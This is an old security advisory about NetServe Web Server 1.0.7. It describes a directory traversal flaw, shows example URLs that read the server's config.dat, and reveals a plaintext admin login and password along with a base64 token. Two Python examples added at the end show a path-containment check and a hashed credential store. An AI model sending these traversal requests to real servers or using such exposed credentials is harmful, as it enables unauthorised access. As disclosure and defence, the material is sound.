netserve107.txt

17 Nov 2003 | Reported by nimber | Type: packetstorm | Source: packetstormsecurity.com

Multiple vulnerabilities in NetServe Web Server 1.0.7; severity high on Windows platforms.

` ________________________  
/   
| For Contacts:   
| nimber   
| e-mail: [email protected]   
| [email protected]   
|Home Page: www.nimber.plux.ru   
|ICQ: 132614   
\________________________   
  
Advisory Information:   
=================   
Application : NetServe Web Server   
Date : 17.11.2003   
Vendor Homepage : http://www.starlots.com/netx/index.html   
Versions : 1.0.7 (maybe older)   
Platforms: Windows NT, 95, 98, 2000, and XP.   
Severity : High   
Local : yes   
Remote: yes   
Tested on WinXP and Win2K.  
  
=================  
Advisory: Multiple vulnerabilities in NetServe 1.0.7  
=================  
Product description (from the developer):   
"About NetServe Web Server  
NetServe is a super compact Web Server and File Sharing application for Windows NT, 95, 98, 2000, and XP.  
Its HTTP Web Server can serve all types of files including html, gif and jpeg, actually any files placed in your NetServe directory can be served.  
New key features include Server-Side-Include (SSI) support and CGI/1.1 support giving you the choice of your preferred scripting language,   
including but not limited to; Perl, ASP and PHP, to create your dynamic content. Other features include a fully integrated File Sharing application   
supplying a html front end to allow for directory browsing and download. A html form gives users the ability to upload up to 5 files simultaneously to any directory.  
With security in mind, NetServe features admin tools that allow you full control of how users accessing your server see the resources available, just some of the   
options include, Access served pages only, allow directory browsing, allow file downloading, and even allow file uploading.  
And of course every action being performed on the NetServe Server is automatically logged, so you can interrogate the logs at a later date for statistics."  
=================  
The contents:  
=================  
+ Advisory Information.  
+ Part 1: Directory traversal vulnerability.   
+ Part 2: Viewing the server configuration.  
+ Part 3: Access to the admin password.   
=================  
Part - 1:  
======  
The server does not filter "/../../" sequences, which makes it possible to move up to a parent folder.  
This vulnerability allows viewing the contents of folders and files.   
Example: http://[victim]/../test/  
Shows the contents of the folder /test/  
Example: http://[victim]/../test/test.txt  
Shows the contents of the file test.txt, which is in the folder /test/  
  
Part - 2:  
======  
In the default server settings, the site folder is [NetServe Web Server folder]\wwwroot\  
If the admin has not changed this setting, the vulnerability described above gives access to the server's configuration file.   
Example:  
http://[victim]/../config.dat  
  
Example of a file:  
================  
EnableCGI True  
EnableRemoteAdmin True  
EnableSSI False  
EnablePasswords True  
IndexFiles index.html index.htm  
SSIAbbrevSize True  
SSIExtensions shtml  
SSIErrorMessage An SSI Error Has Occured  
SSITimeFormat   
AuthenticationType Basic  
Port 80  
ServerRoot D:\Program Files\NetServe Web Server\wwwroot\  
Logging True  
Counter False  
Minimized True  
ActivateOnStart False  
MimeTypes application/mac-binhex40|hqx  
MimeTypes application/msword|doc  
MimeTypes application/octet-stream|bin dms lha lzh exe class  
MimeTypes application/pdf|pdf  
MimeTypes application/postscript|ai eps ps  
MimeTypes application/smil|smi smil  
MimeTypes application/vnd.mif|mif  
MimeTypes application/vnd.ms-asf|asf  
MimeTypes application/vnd.ms-excel|xls  
MimeTypes application/vnd.ms-powerpoint|ppt  
MimeTypes application/x-cdlink|vcd  
MimeTypes application/x-compress|Z  
MimeTypes application/x-cpio|cpio  
MimeTypes application/x-csh|csh  
MimeTypes application/x-director|dcr dir dxr  
MimeTypes application/x-dvi|dvi  
MimeTypes application/x-gtar|gtar  
MimeTypes application/x-gzip|gz  
MimeTypes application/x-javascript|js  
MimeTypes application/x-latex|latex  
MimeTypes application/x-sh|sh  
MimeTypes application/x-shar|shar  
MimeTypes application/x-shockwave-flash|swf  
MimeTypes application/x-stuffit|sit  
MimeTypes application/x-tar|tar  
MimeTypes application/x-tcl|tcl  
MimeTypes application/x-tex|tex  
MimeTypes application/x-texinfo|texinfo texi  
MimeTypes application/x-troff|t tr roff  
MimeTypes application/x-troff-man|man  
MimeTypes application/x-troff-me|me  
MimeTypes application/x-troff-ms|ms  
MimeTypes application/zip|zip  
MimeTypes audio/basic|au snd  
MimeTypes audio/midi|mid midi kar  
MimeTypes audio/mpeg|mpga mp2 mp3  
MimeTypes audio/x-aiff|aif aiff aifc  
MimeTypes audio/x-pn-realaudio|ram rm  
MimeTypes audio/x-realaudio|ra  
MimeTypes audio/x-wav|wav  
MimeTypes image/bmp|bmp  
MimeTypes image/gif|gif  
MimeTypes image/ief|ief  
MimeTypes image/jpeg|jpeg jpg jpe  
MimeTypes image/png|png  
MimeTypes image/tiff|tiff tif  
MimeTypes image/x-cmu-raster|ras  
MimeTypes image/x-portable-anymap|pnm  
MimeTypes image/x-portable-bitmap|pbm  
MimeTypes image/x-portable-graymap|pgm  
MimeTypes image/x-portable-pixmap|ppm  
MimeTypes image/x-rgb|rgb  
MimeTypes image/x-xbitmap|xbm  
MimeTypes image/x-xpixmap|xpm  
MimeTypes image/x-xwindowdump|xwd  
MimeTypes image/x-icon|ico  
MimeTypes model/iges|igs iges  
MimeTypes model/mesh|msh mesh silo  
MimeTypes model/vrml|wrl vrml  
MimeTypes text/css|css  
MimeTypes text/html|html htm  
MimeTypes text/plain|asc txt  
MimeTypes text/richtext|rtx  
MimeTypes text/rtf|rtf  
MimeTypes text/sgml|sgml sgm  
MimeTypes text/tab-separated-values|tsv  
MimeTypes text/xml|xml  
MimeTypes video/mpeg|mpeg mpg mpe  
MimeTypes video/quicktime|qt mov  
MimeTypes video/x-msvideo|avi  
Users nimber|password||bmltYmWyfnZpFXmuYW0=  
Aliases /admin|D:\Program Files\NetServe Web Server\admin  
================  
  
Part - 3:  
======  
Using the vulnerability described above, we can obtain the admin password for the server's remote administration. This allows us to change the server configuration completely!   
The login and password can be seen in the configuration file discussed above, config.dat.   
If you look at its last lines, you can see the information we need:  
====[config.dat]====  
Users nimber|vietnam||bmltYmVyOnZpZXRuYW0=  
Aliases /admin|D:\Program Files\NetServe Web Server\admin  
====[config.dat]====  
  
We can also see the folder that holds the admin scripts.  
I want to draw your attention to the fact that the password and login are not protected!  
  
=================  
For Contacts:  
nimber  
e-mail: [email protected]  
[email protected]  
Home Page: www.nimber.plux.ru  
ICQ: 132614  
=================  
Gr33tz: ZeT, XSPYD3X, euronymous, JLx, Iww, unix, Demon, mestereeo, Pirog, Corpse, x-a13x, insurrectionist, UnInstall, Kabuto and all my friends.  
Re: krok, 3APA3A, buggzy.  
  
p.s> SORRY for my bad english ;)  
_EOF_   
`
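
Added example (not part of nimber's advisory and not NetServe code): a containment check a server could apply to the requests shown in Parts 1 and 2, using the ServerRoot from the sample config.dat. The helper name resolve_request and the use of Python's ntpath module to apply Windows path rules are assumptions made for illustration.

```python
import ntpath
from urllib.parse import unquote

# ServerRoot from the advisory's sample config.dat (trailing backslash dropped).
SERVER_ROOT = r"D:\Program Files\NetServe Web Server\wwwroot"


def resolve_request(url_path, server_root=SERVER_ROOT):
    """Map a request path to a file under server_root, or return None.

    Hypothetical helper. ntpath applies Windows path rules on any OS and
    nothing here touches the file system.
    """
    # Decode once, as a server would before mapping the path to disk.
    decoded = unquote(url_path.split("?", 1)[0])
    if "\x00" in decoded or ":" in decoded:
        return None  # NUL bytes, drive letters, NTFS stream names
    # Treat the request as relative: both separator styles, no leading slash.
    relative = decoded.replace("/", "\\").lstrip("\\")
    root = ntpath.normpath(server_root)
    # normpath collapses ".." so the comparison sees the real target.
    candidate = ntpath.normpath(ntpath.join(root, relative))
    norm_root = ntpath.normcase(root)
    norm_candidate = ntpath.normcase(candidate)
    # Require the root itself or a path below it; the added separator keeps
    # a sibling such as "wwwroot-old" from passing a plain prefix test.
    if norm_candidate != norm_root and not norm_candidate.startswith(norm_root + "\\"):
        return None
    return candidate
```

With this check the advisory's example paths /../config.dat and /../test/test.txt resolve outside wwwroot and are refused, as are their percent-encoded and backslash forms.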
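
Added example for Part 3 (not from the advisory and not NetServe code): an audit of the Users entry shown in the second config.dat excerpt, beside a salted PBKDF2 record that would not disclose the password if config.dat were read. The field interpretation, the record layout and the iteration count are assumptions.

```python
import base64
import hashlib
import hmac
import os

# Users line exactly as shown in the advisory's second config.dat excerpt.
USERS_LINE = "Users nimber|vietnam||bmltYmVyOnZpZXRuYW0="
ITERATIONS = 600_000  # PBKDF2-HMAC-SHA256 work factor (assumed policy value)


def audit_users_line(line):
    """Return findings for one 'Users' entry in the page's config.dat layout."""
    _, _, value = line.partition(" ")
    # Assumed meaning of the four '|'-separated fields: login, password,
    # an unused field, and a base64 token.
    login, password, _, token = value.split("|")
    findings = []
    if password:
        findings.append("cleartext password stored for " + login)
    try:
        decoded = base64.b64decode(token, validate=True).decode("utf-8")
    except ValueError:
        decoded = None  # not valid base64 or not text
    if decoded == login + ":" + password:
        findings.append("token is reversible base64 of login:password")
    return findings


def make_record(login, password, salt=None):
    """Hardened alternative: keep only a salted, slow hash of the password."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return "|".join([login, "pbkdf2-sha256", str(ITERATIONS), salt.hex(), digest.hex()])


def verify(record, password):
    """Constant-time check of a candidate password against a stored record."""
    _, _, iterations, salt_hex, digest_hex = record.split("|")
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(candidate.hex(), digest_hex)
```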
